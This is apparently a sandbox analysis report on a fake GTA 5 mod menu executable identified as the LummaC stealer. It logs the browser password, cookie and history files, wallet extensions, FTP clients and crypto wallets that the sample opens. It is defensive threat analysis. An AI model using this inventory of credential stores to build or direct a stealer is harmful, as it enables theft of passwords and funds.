Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 0_2_00F8A2F5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F8A2F5

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2196493094.0000000003593000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \MsMpeng.exe

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior

Source: Yara match	File source: 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
